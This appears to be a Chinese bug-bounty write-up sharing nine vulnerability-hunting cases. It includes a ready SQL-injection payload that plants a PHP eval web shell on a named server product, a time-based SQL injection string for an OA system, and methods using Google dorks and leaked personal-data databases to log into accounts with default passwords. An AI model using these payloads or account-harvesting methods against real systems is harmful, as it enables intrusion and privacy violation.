文章来源: https://xz.aliyun.com/t/14874

简要

信息收集的重要性不言而喻，根据互联网侧信息泄露+社会工程学技术可以收集大量信息，通过该信息登录后台获取更多功能点扩大信息收集面继续扩大功能点，从而通过更多的功能点测试更多的漏洞。

案例1

google搜索初始密码

site:xxx.edu.cn  初始密码

获取到默认账号和密码规则

google搜索学号

site:xxx.edu.cn  学号

知道初始密码是身份证号，sg库去搜名字检索综合数据

默认账密登录

成功登录系统

案例2

同样操作，搜索学号

信息收集

忘记密码处

重置密码

成功重置登录

案例3

google搜索

获取到默认初始密码

登录系统

成功登录系统

这个信息泄露2000+账号

案例4

天翼系统NDay

直接搜索Nday，使用如下payload

/AgentBoard.XGI?user=-1'+union+select+1,'<?php+eval($_POST["cmd"]);?>'+into+outfile+"C:\Program+Files+(x86)\RealFriend\Rap+Server\WebRoot\4.php"+--+-&cmd=UserLogin

成功上传文件造成RCE

案例5

接口泄露敏感信息
这个可以看JS前端泄露，一般VUE框架都是前后端分离，接口很多，拿到所有接口写个字典爆破一下，说不定那个程序员粗心（高情商说法）有一个接口就没有鉴权。

案例6

前端逻辑缺陷
改返回包状态码直接绕过登录，这种对于前后端分离框架的网站也是很多的
网站输入用户名密码，登录抓包

获取上图返回包并更改resultCode为0.发包

成功进入后台

案例7

某OA的Nday
OA系统的漏洞都比较多，遇到网站使用的OA系统可去网上搜索历史漏洞，这里有一个SQL注入。
某OAsql延时注入
payload

company=1&userName=1&openid=1&source=1&mobile=1%27%20AND%20(SELECT%208094%20FROM%20(SELECT(SLEEP(9-(IF(18015%3E3469,0,4)))))mKjk)%20OR%20%27KQZm%27=%27REcX

sqlmap检测

案例8

某旅行公司的接口未授权
可直接访问注册按钮，注册用户
然后进行登录，成功登录

还发现管理员用户为弱口令admin:123456

案例9

网站挂黑链
这种对于ZF性质的网站是很严重的，主要是页面自带连接，可使用一些检测工具进行分析
如下图，某ZF网站登录口，鼠标悬停发现链接为sclbs.net网站

点击直接跳转至BC网站

总结

这几个案例算是漏洞挖掘比较常见的，也是相对来说SRC挖掘最快速有效的，但是最好使的还是如下：

社工+互联网侧信息收集拿大分，下课！


声明：⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤，任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的，否则后果⾃⾏承担。

原文始发于微信公众号（白帽子左一）：互联网侧漏--挖掘思路分享